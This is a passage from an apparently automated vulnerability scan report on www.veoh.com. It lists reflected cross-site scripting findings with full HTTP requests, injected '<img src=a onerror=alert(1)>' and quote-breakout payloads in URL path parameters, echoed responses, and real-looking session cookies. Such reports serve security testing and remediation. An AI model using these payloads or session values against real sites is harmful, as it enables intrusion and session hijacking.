The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb was submitted in the REST URL parameter 4. This input was echoed as 5c238<img src=a onerror=alert(1)>411e688a8fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure5c238<img src=a onerror=alert(1)>411e688a8fb"}</textarea>
...[SNIP]...

1.415. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a62'%3b78d21d340d1 was submitted in the REST URL parameter 6. This input was echoed as 47a62';78d21d340d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN47a62'%3b78d21d340d1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:58 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'f34e2f7249b7650fa7584894a2fd62df',
'v207484775fTsGMdN47a62';78d21d340d1'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.416. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72 was submitted in the REST URL parameter 4. This input was echoed as 89285<img src=a onerror=alert(1)>bd2cbbace72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure89285<img src=a onerror=alert(1)>bd2cbbace72"}</textarea>
...[SNIP]...

1.417. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6 was submitted in the REST URL parameter 4. This input was echoed as 43948"><img src=a onerror=alert(1)>46bf4b641b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:11 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure43948"><img src=a onerror=alert(1)>46bf4b641b6/sort/most viewed" selected="selected">
...[SNIP]...

1.418. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1503'%3b3c33fe8edd6 was submitted in the REST URL parameter 6. This input was echoed as a1503';3c33fe8edd6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZCa1503'%3b3c33fe8edd6 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'0d02849a2731b721fe5fd6d7cd18b899',
'v207490874eKBjfZCa1503';3c33fe8edd6'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.419. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8 was submitted in the REST URL parameter 4. This input was echoed as fb7a9"><img src=a onerror=alert(1)>a20cb2010f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurefb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=95
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurefb7a9"><img src=a onerror=alert(1)>a20cb2010f8/sort/most viewed" selected="selected">
...[SNIP]...

1.420. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1 was submitted in the REST URL parameter 4. This input was echoed as 267b0<img src=a onerror=alert(1)>f093e2717f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=47
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure267b0<img src=a onerror=alert(1)>f093e2717f1"}</textarea>
...[SNIP]...

1.421. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9339'%3bd4a836c8b6c was submitted in the REST URL parameter 6. This input was echoed as a9339';d4a836c8b6c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekAa9339'%3bd4a836c8b6c HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:16 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=14
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'1866d7d6148455dd31ade42934b7bfb0',
'v20749145FCR2QekAa9339';d4a836c8b6c'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.422. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9 was submitted in the REST URL parameter 4. This input was echoed as 8887d"><img src=a onerror=alert(1)>d7d3c7b55c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:26 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=4
Content-Length: 76350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure8887d"><img src=a onerror=alert(1)>d7d3c7b55c9/sort/most viewed" selected="selected">
...[SNIP]...

1.423. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576 was submitted in the REST URL parameter 4. This input was echoed as e2bc5<img src=a onerror=alert(1)>20ab6849576 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuree2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=88
Content-Length: 76304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree2bc5<img src=a onerror=alert(1)>20ab6849576"}</textarea>
...[SNIP]...

1.424. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 217c0'%3b0ff76e45310 was submitted in the REST URL parameter 6. This input was echoed as 217c0';0ff76e45310 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N217c0'%3b0ff76e45310 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'b0e4a2b3cb22b22c0ca21fc59fcdbf7d',
'v20753891TQ237Z7N217c0';0ff76e45310'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
